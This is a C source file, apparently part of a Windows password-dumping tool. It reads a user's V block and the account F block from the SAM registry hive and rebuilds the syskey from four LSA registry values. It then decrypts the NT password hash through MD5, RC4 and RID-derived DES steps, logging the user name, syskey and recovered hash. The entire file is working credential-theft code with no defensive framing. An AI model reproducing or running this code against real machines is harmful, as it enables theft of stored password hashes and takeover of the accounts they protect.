#include "GetSAM.h"



void DumpSam(char *SubKeyRID){

char buffer[MAX_PATH], cRegKeyPath[1024];
LPTSTR lpbuf = buffer;
LPTSTR RegistryKeyPath = cRegKeyPath;

BYTE FBlock[MAX_DATA_SIZE], VBlock[MAX_DATA_SIZE];
DWORD FBlockLen = MAX_DATA_SIZE;
DWORD VBlockLen = MAX_DATA_SIZE;

BYTE *nthash, *UserNameA;
BYTE RegistryKeyValue[4], bootkey[16], MD5HashData[16];

DWORD dwNTHashLen, dwUserNameLen;

int p[] = {0x8, 0x5, 0x4, 0x2, 0xb, 0x9, 0xd, 0x3, 0x0, 0x6, 0x1, 0xc, 0xe, 0xa, 0xf, 0x7};

BYTE FBox[0x10], FFragment[0x20], syskey[0x10];

unsigned char aqwerty[] = "!@#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%";
unsigned char anum[] = "0123456789012345678901234567890123456789";
unsigned char antpassword[] = "NTPASSWORD";

HKEY hSAM;
DWORD dwError;

int rid, i;

unsigned char md5hash[0x10];
unsigned char hbootkey[0x20];
unsigned char obfkey[0x10];
unsigned char obfkey1[0x8];
unsigned char obfkey2[0x8];
unsigned char NTpasswordHash[0x10];
unsigned char HexNTpasswordHash[0x20];
unsigned char HexSyskey[0x20];
unsigned char deskey1[8], deskey2[8];

//////////////////////////////////////////////////////////////////////
//CryptoAPI

HCRYPTPROV hCryptProv = (ULONG_PTR)NULL; 
HCRYPTHASH hHash;
HCRYPTKEY hKey = (ULONG_PTR)NULL;

DWORD dwHashDataLen = 0x10, dwWorkingBufferLength;

DESKEY_BLOB DesKeyBlob;
BYTE bDesKeyBlob[20];
//////////////////////////////////////////////////////////////////////

//****************************************************************************************************

	wsprintf(RegistryKeyPath, "%s\\%s", REGISTRY_KEY, SubKeyRID);
	
	//Open SAM to retrieve NT hash
	dwError = RegOpenKeyEx(HKEY_LOCAL_MACHINE, RegistryKeyPath, 0, 
		KEY_READ, &hSAM);
	if (dwError != ERROR_SUCCESS){
		wsprintf(lpbuf, "%d", dwError);
		Write2LogFile("Error RegOpen:", 0);
		Write2LogFile(lpbuf, 0);
	}
	else {
		//Retrieve V Block
		EnumerateRegValues(hSAM, "V", VBlock, &VBlockLen);
		dwNTHashLen = VBlock[0xAC] + 0x100*VBlock[0xAD] -4;
		dwUserNameLen = VBlock[0x10] + 0x100*VBlock[0x1a];

		if (!dwUserNameLen || !dwNTHashLen)return;
		//wsprintf(lpbuf, "%s %d", "User Name size:", dwUserNameLen);
		//Write2LogFile(lpbuf, 0);

		nthash = (PBYTE)VirtualAlloc(NULL, dwNTHashLen, MEM_COMMIT | MEM_RESERVE, 
						PAGE_READWRITE);

		UserNameA = (PBYTE)VirtualAlloc(NULL, dwUserNameLen/2, MEM_COMMIT | MEM_RESERVE, 
						PAGE_READWRITE);

		if (!nthash || !UserNameA){
			Write2LogFile("Error allocating memory", 0);
			return;
		}
		else {
			for (i = 0; i < dwNTHashLen; i++){
				nthash[i] = VBlock[VBlock[0xa8] + VBlock[0xa9]*0x100 + 4 + 0xcc + i];
			}//end for
			//Write2LogFile("NT Hash:", 0);
			//Write2LogFile(nthash, dwNTHashLen);

			//wsprintf(lpbuf, "%d", dwNTHashLen);
			//Write2LogFile("dwNTHashLen:", 0);
			//Write2LogFile(lpbuf, 0);

			for (i = 0; i < dwUserNameLen/2; i++){
				UserNameA[i] = VBlock[VBlock[0xc] + VBlock[0xd]*0x100 + 0xcc + 2*i];
			}//end for

			Write2LogFile("User name:", 0);
			Write2LogFile(UserNameA, dwUserNameLen/2);

		}//end else

		//Retrieve F Block
		if (hSAM)RegCloseKey(hSAM);
		dwError = RegOpenKeyEx(HKEY_LOCAL_MACHINE, REGISTRY_KEY_ACCOUNT, 0, 
			KEY_READ, &hSAM);
		EnumerateRegValues(hSAM, "F", FBlock, &FBlockLen);

		for (i = 0; i < 16; i++){
			FBox[i] = FBlock[i + 0x70];
		}
		for (i = 0; i < 32; i++){
			FFragment[i] = FBlock[i + 0x80];
		}
		//Write2LogFile("FBox:", 0);
		//Write2LogFile(FBox, 16);

		//Write2LogFile("FFragment:", 0);
		//Write2LogFile(FFragment, 32);

	}//end else


	//Retrieve Syskey Part 1
	RetrieveSysKey(REGISTRY_LSAJD, RegistryKeyValue);
	for (i = 0; i < 4; i++){
		bootkey[i] = RegistryKeyValue[i];
	}

	//Retrieve Syskey Part 2
	RetrieveSysKey(REGISTRY_LSASKEW, RegistryKeyValue);
	for (i = 0; i < 4; i++){
		bootkey[i + 4] = RegistryKeyValue[i];
	}

	//Retrieve Syskey Part 3
	RetrieveSysKey(REGISTRY_LSAGBG, RegistryKeyValue);
	for (i = 0; i < 4; i++){
		bootkey[i + 8] = RegistryKeyValue[i];
	}

	//Retrieve Syskey Part 4
	RetrieveSysKey(REGISTRY_LSADATA, RegistryKeyValue);
	for (i = 0; i < 4; i++){
		bootkey[i + 12] = RegistryKeyValue[i];
	}

	//Re-arrange boot key with the help of the p-constant
	for (i = 0; i < 16; i++){
		syskey[i] = bootkey[p[i]];
	}

	Convert2Hex(syskey, 0x10, HexSyskey);
	Write2LogFile("Syskey:", 0);
	Write2LogFile(HexSyskey, 0x20);

	//1st MD5 hashing loop
	if(!CryptAcquireContext(&hCryptProv, NULL, NULL, PROV_RSA_FULL, 0)){
		dwError = GetLastError();
		wsprintf(lpbuf, "%x", dwError);
		Write2LogFile("Error CSP not found code:", 0);
		Write2LogFile(lpbuf, 0);
		exit(1);
		}

	if (!CryptCreateHash(hCryptProv, CALG_MD5, 0, 0, &hHash)){
		dwError = GetLastError();
		wsprintf(lpbuf, "%x", dwError);
		Write2LogFile("Error creating hash code:", 0);
		Write2LogFile(lpbuf, 0);
		exit(1);
		}

	if (!CryptHashData(hHash, FBox, 0x10, 0)){
		dwError = GetLastError();
		wsprintf(lpbuf, "%x", dwError);
		Write2LogFile("Error crypting hash code:", 0);
		Write2LogFile(lpbuf, 0);
		exit(1);
	}

	if (!CryptHashData(hHash, aqwerty, 0x2f, 0)){
		dwError = GetLastError();
		wsprintf(lpbuf, "%x", dwError);
		Write2LogFile("Error crypting hash code:", 0);
		Write2LogFile(lpbuf, 0);
		exit(1);
	}

	if (!CryptHashData(hHash, syskey, 0x10, 0)){
		dwError = GetLastError();
		wsprintf(lpbuf, "%x", dwError);
		Write2LogFile("Error crypting hash code:", 0);
		Write2LogFile(lpbuf, 0);
		exit(1);
	}

	if (!CryptHashData(hHash, anum, 0x29, 0)){
		dwError = GetLastError();
		wsprintf(lpbuf, "%x", dwError);
		Write2LogFile("Error crypting hash code:", 0);
		Write2LogFile(lpbuf, 0);
		exit(1);
	}

	if (!CryptGetHashParam(hHash, HP_HASHVAL, md5hash, &dwHashDataLen, 0)){
		dwError = GetLastError();
		wsprintf(lpbuf, "%d", dwError);
		Write2LogFile("Error getting hash code:", 0);
		Write2LogFile(lpbuf, 0);
		exit(1);
	}

	if (dwHashDataLen != 0x10){
		Write2LogFile("Error with hash size:", 0);
		exit(1);
	}

	//Write2LogFile("MD5 hash:", 0);
	//Write2LogFile(md5hash, 0x10);

	if (hHash)CryptDestroyHash(hHash);
	if (hCryptProv)CryptReleaseContext(hCryptProv, 0);

	//1st RC4 encryption loop
	RC4Crypt(md5hash, FFragment, hbootkey);
	//Write2LogFile("hbootkey:", 0);
	//Write2LogFile(hbootkey, 0x10);
	

	//2nd MD5 hashing loop
	if(!CryptAcquireContext(&hCryptProv, NULL, NULL, PROV_RSA_FULL, 0)){
		dwError = GetLastError();
		wsprintf(lpbuf, "%x", dwError);
		Write2LogFile("Error CSP not found code:", 0);
		Write2LogFile(lpbuf, 0);
		exit(1);
		}

	if (!CryptCreateHash(hCryptProv, CALG_MD5, 0, 0, &hHash)){
		dwError = GetLastError();
		wsprintf(lpbuf, "%x", dwError);
		Write2LogFile("Error creating hash code:", 0);
		Write2LogFile(lpbuf, 0);
		exit(1);
		}

	if (!CryptHashData(hHash, hbootkey, 0x10, 0)){
		dwError = GetLastError();
		wsprintf(lpbuf, "%x", dwError);
		Write2LogFile("Error crypting hash code:", 0);
		Write2LogFile(lpbuf, 0);
		exit(1);
	}

	rid = strtol(SubKeyRID, NULL, 16);
	wsprintf(lpbuf, "%d", rid);
	Write2LogFile("Rid:", 0);
	Write2LogFile(lpbuf, 0);

	if (!CryptHashData(hHash, &rid, 0x4, 0)){
		dwError = GetLastError();
		wsprintf(lpbuf, "%x", dwError);
		Write2LogFile("Error crypting hash code:", 0);
		Write2LogFile(lpbuf, 0);
		exit(1);
	}

	if (!CryptHashData(hHash, antpassword, 0xb, 0)){
		dwError = GetLastError();
		wsprintf(lpbuf, "%x", dwError);
		Write2LogFile("Error crypting hash code:", 0);
		Write2LogFile(lpbuf, 0);
		exit(1);
	}

	if (!CryptGetHashParam(hHash, HP_HASHVAL, md5hash, &dwHashDataLen, 0)){
		dwError = GetLastError();
		wsprintf(lpbuf, "%x", dwError);
		Write2LogFile("Error getting hash code:", 0);
		Write2LogFile(lpbuf, 0);
		exit(1);
	}

	if (dwHashDataLen != 0x10){
		Write2LogFile("Error with hash size:", 0);
		exit(1);
	}

	//Write2LogFile("MD5 hash:", 0);
	//Write2LogFile(md5hash, 0x10);


	//Write2LogFile("nthash:", 0);
	//Write2LogFile(nthash, 0x10);

	//2nd RC4 encryption loop
	RC4Crypt(md5hash, nthash, obfkey);
	//Write2LogFile("obfkey:", 0);
	//Write2LogFile(obfkey, 0x10);

	for (i = 0; i < 0x8; i++){
		obfkey1[i] = obfkey[i];
	}
	for (i = 0; i < 0x8; i++){
		obfkey2[i] = obfkey[i + 0x8];
	}

	sid_to_key1(rid,(unsigned char *)deskey1);
	sid_to_key2(rid,(unsigned char *)deskey2);

	if(hCryptProv)CryptReleaseContext(hCryptProv, 0);

	if(!CryptAcquireContext(&hCryptProv, NULL, NULL, PROV_RSA_FULL, CRYPT_VERIFYCONTEXT)){
		dwError = GetLastError();
		wsprintf(lpbuf, "%x", dwError);
		Write2LogFile("Error Acquiring DES Context:", 0);
		Write2LogFile(lpbuf, 0);
		exit(1);
	}

	ZeroMemory(&DesKeyBlob, 20);

	DesKeyBlob.BlobHeader.reserved = 0;
	DesKeyBlob.BlobHeader.bType = PLAINTEXTKEYBLOB;
	DesKeyBlob.BlobHeader.aiKeyAlg = CALG_DES;
	DesKeyBlob.BlobHeader.bVersion = CUR_BLOB_VERSION;
	DesKeyBlob.dwKeyLen = 8;

	//DES 1st loop
	for (i = 0; i < 8; i++){
		DesKeyBlob.Key[i] = deskey1[i];
	}
	
	memcpy(bDesKeyBlob, (PVOID)&DesKeyBlob, 20);

	// Generate key from Key BLOB
	if (!CryptImportKey(hCryptProv, bDesKeyBlob, 20, 0, CRYPT_EXPORTABLE, &hKey)){

		FormatMessage(FORMAT_MESSAGE_FROM_SYSTEM, NULL, GetLastError(), 
				MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), lpbuf, MAX_PATH, NULL);

		Write2LogFile("Error importing key:", 0);
		Write2LogFile(lpbuf, 0);
	}

	dwWorkingBufferLength = 8;

	if (!CryptDecrypt(hKey, (HCRYPTHASH)NULL, TRUE, 0, obfkey1, &dwWorkingBufferLength)){
		/*FormatMessage(FORMAT_MESSAGE_FROM_SYSTEM, NULL, GetLastError(), 
				MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), lpbuf, MAX_PATH, NULL);
		Write2LogFile("Error decrypting:", 0);
		Write2LogFile(lpbuf, 0);*/
	}

	//DES 2nd loop
	for (i = 0; i < 8; i++){
		DesKeyBlob.Key[i] = deskey2[i];
	}
	
	memcpy(bDesKeyBlob, (PVOID)&DesKeyBlob, 20);

	// Generate key from Key BLOB
	if (!CryptImportKey(hCryptProv, bDesKeyBlob, 20, 0, CRYPT_EXPORTABLE, &hKey)){

		FormatMessage(FORMAT_MESSAGE_FROM_SYSTEM, NULL, GetLastError(), 
				MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), lpbuf, MAX_PATH, NULL);

		Write2LogFile("Error importing key:", 0);
		Write2LogFile(lpbuf, 0);
	}

	dwWorkingBufferLength = 8;

	if (!CryptDecrypt(hKey, (HCRYPTHASH)NULL, TRUE, 0, obfkey2, &dwWorkingBufferLength)){
		/*FormatMessage(FORMAT_MESSAGE_FROM_SYSTEM, NULL, GetLastError(), 
				MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), lpbuf, MAX_PATH, NULL);
		Write2LogFile("Error decrypting:", 0);
		Write2LogFile(lpbuf, 0);*/
	}

	for (i = 0; i < 0x8; i++){
		NTpasswordHash[i] = obfkey1[i];
	}
	for (i = 0; i < 0x8; i++){
		NTpasswordHash[i + 0x8] = obfkey2[i];
	}

	
	Convert2Hex(NTpasswordHash, 0x10, HexNTpasswordHash);
	Write2LogFile("Password hash:", 0);
	Write2LogFile(HexNTpasswordHash, 0x20);

	

CleanAndQuit:
	if(hCryptProv)
		if (!CryptReleaseContext(hCryptProv, 0))Write2LogFile("Error Releasing Context", 0);

	if (nthash)VirtualFree(nthash, 0, MEM_RELEASE);
	if (UserNameA)VirtualFree(UserNameA, 0, MEM_RELEASE);
	if (hSAM)RegCloseKey(hSAM);
return;
}

void str_to_key(unsigned char *str, unsigned char *key){
      int i;

      key[0] = str[0]>>1;
      key[1] = ((str[0]&0x01)<<6) | (str[1]>>2);
      key[2] = ((str[1]&0x03)<<5) | (str[2]>>3);
      key[3] = ((str[2]&0x07)<<4) | (str[3]>>4);
      key[4] = ((str[3]&0x0F)<<3) | (str[4]>>5);
      key[5] = ((str[4]&0x1F)<<2) | (str[5]>>6);
      key[6] = ((str[5]&0x3F)<<1) | (str[6]>>7);
      key[7] = str[6]&0x7F;
      for (i=0;i<8;i++) {
            key[i] = (key[i]<<1);
      }
      des_set_odd_parity((DES_cblock *)key);
}

/*
* Function to convert the RID to the first decrypt key.
*/

void sid_to_key1(unsigned long sid,unsigned char deskey[8])
{
      unsigned char s[7];

      s[0] = (unsigned char)(sid & 0xFF);
      s[1] = (unsigned char)((sid>>8) & 0xFF);
      s[2] = (unsigned char)((sid>>16) & 0xFF);
      s[3] = (unsigned char)((sid>>24) & 0xFF);
      s[4] = s[0];
      s[5] = s[1];
      s[6] = s[2];

      str_to_key(s,deskey);
}

/*
* Function to convert the RID to the second decrypt key.
*/

void sid_to_key2(unsigned long sid,unsigned char deskey[8])
{
      unsigned char s[7];

      s[0] = (unsigned char)((sid>>24) & 0xFF);
      s[1] = (unsigned char)(sid & 0xFF);
      s[2] = (unsigned char)((sid>>8) & 0xFF);
      s[3] = (unsigned char)((sid>>16) & 0xFF);
      s[4] = s[0];
      s[5] = s[1];
      s[6] = s[2];

      str_to_key(s,deskey);
}
void des_set_odd_parity(DES_cblock *key){

static const unsigned char odd_parity[256] = {
  1,  1,  2,  2,  4,  4,  7,  7,  8,  8, 11, 11, 13, 13, 14, 14,
 16, 16, 19, 19, 21, 21, 22, 22, 25, 25, 26, 26, 28, 28, 31, 31,
 32, 32, 35, 35, 37, 37, 38, 38, 41, 41, 42, 42, 44, 44, 47, 47,
 49, 49, 50, 50, 52, 52, 55, 55, 56, 56, 59, 59, 61, 61, 62, 62,
 64, 64, 67, 67, 69, 69, 70, 70, 73, 73, 74, 74, 76, 76, 79, 79,
 81, 81, 82, 82, 84, 84, 87, 87, 88, 88, 91, 91, 93, 93, 94, 94,
 97, 97, 98, 98,100,100,103,103,104,104,107,107,109,109,110,110,
112,112,115,115,117,117,118,118,121,121,122,122,124,124,127,127,
128,128,131,131,133,133,134,134,137,137,138,138,140,140,143,143,
145,145,146,146,148,148,151,151,152,152,155,155,157,157,158,158,
161,161,162,162,164,164,167,167,168,168,171,171,173,173,174,174,
176,176,179,179,181,181,182,182,185,185,186,186,188,188,191,191,
193,193,194,194,196,196,199,199,200,200,203,203,205,205,206,206,
208,208,211,211,213,213,214,214,217,217,218,218,220,220,223,223,
224,224,227,227,229,229,230,230,233,233,234,234,236,236,239,239,
241,241,242,242,244,244,247,247,248,248,251,251,253,253,254,254};

int i;
	for (i=0; i < 8; i++){
		(*key)[i] = odd_parity[(*key)[i]];
	}

return;
}